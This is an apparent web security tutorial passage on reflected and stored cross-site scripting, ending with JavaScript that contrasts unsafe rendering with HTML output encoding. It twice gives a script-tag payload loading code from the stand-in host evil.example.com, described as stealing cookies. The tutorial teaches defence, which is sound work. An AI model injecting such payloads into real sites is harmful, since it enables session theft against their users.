Now that you know what an XSS attack is, let’s look at some cross-site scripting examples.
Reflected XSS
Let’s say an attacker encounters a URL with a parameter containing a message like this:
http://example.com/?message=You+are+now+logged-in
The page then displays this exact message.
This means that anything passed in the parameter named message will be printed in the page.
To exploit it, the attacker just has to replace the message with a malicious script:
http://example.com/?message=<script src="http://evil.example.com/malicious-script.js"></script>
He then sends the link to the administrator. When the page loads, the script can steal user data such as cookies and send it to the attacker’s email.
Stored XSS
This works like the first one, but this time the content is stored in the database of the targeted, vulnerable website.
Let’s say an attacker posts a comment containing HTML tags, and the tags are evaluated. This can lead to XSS.
To exploit it, the attacker just adds the malicious script link to his message:
<script src="http://evil.example.com/malicious-script.js"></script>
If the website is vulnerable, it means user input is not being sanitized before it is printed in the page.
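The missing sanitization, shown for both cases above as an added example (not code from the original page): the same message value is rendered once by plain concatenation and once with HTML output encoding. The function names, the page template and the in-memory comment list standing in for the database are assumptions made for illustration.

```javascript
// Added example: one "message" value rendered without and with output encoding.
// Function names and the <p class="notice"> template are hypothetical.

// Encode the characters that let text break out of an HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the parameter is concatenated into the page as markup.
function renderUnsafe(message) {
  return '<p class="notice">' + message + '</p>';
}

// Hardened: the parameter is encoded, so the browser displays it as text.
function renderSafe(message) {
  return '<p class="notice">' + escapeHtml(message) + '</p>';
}

// Reflected case: the value comes from the query string of the request URL.
function messageFromUrl(url) {
  return new URL(url).searchParams.get('message') ?? '';
}

// Stored case: comments saved earlier are rendered for every later visitor.
// The array passed in stands in for rows read from the database.
function renderComments(comments, render) {
  return comments.map((c) => render(c)).join('\n');
}

// Constructed sample inputs, matching the URLs shown in the text.
const benignUrl = 'http://example.com/?message=You+are+now+logged-in';
const scriptUrl = 'http://example.com/?message=' +
  encodeURIComponent('<script src="http://evil.example.com/malicious-script.js"></script>');
const storedComments = ['Nice post!', messageFromUrl(scriptUrl)];

console.log(renderUnsafe(messageFromUrl(scriptUrl))); // script tag reaches the page as markup
console.log(renderSafe(messageFromUrl(scriptUrl)));   // script tag is shown as text
console.log(renderComments(storedComments, renderSafe));
```

HTML encoding on output covers values placed in the page body or in quoted attributes; values placed inside script blocks, URLs or style rules need encoding specific to that context.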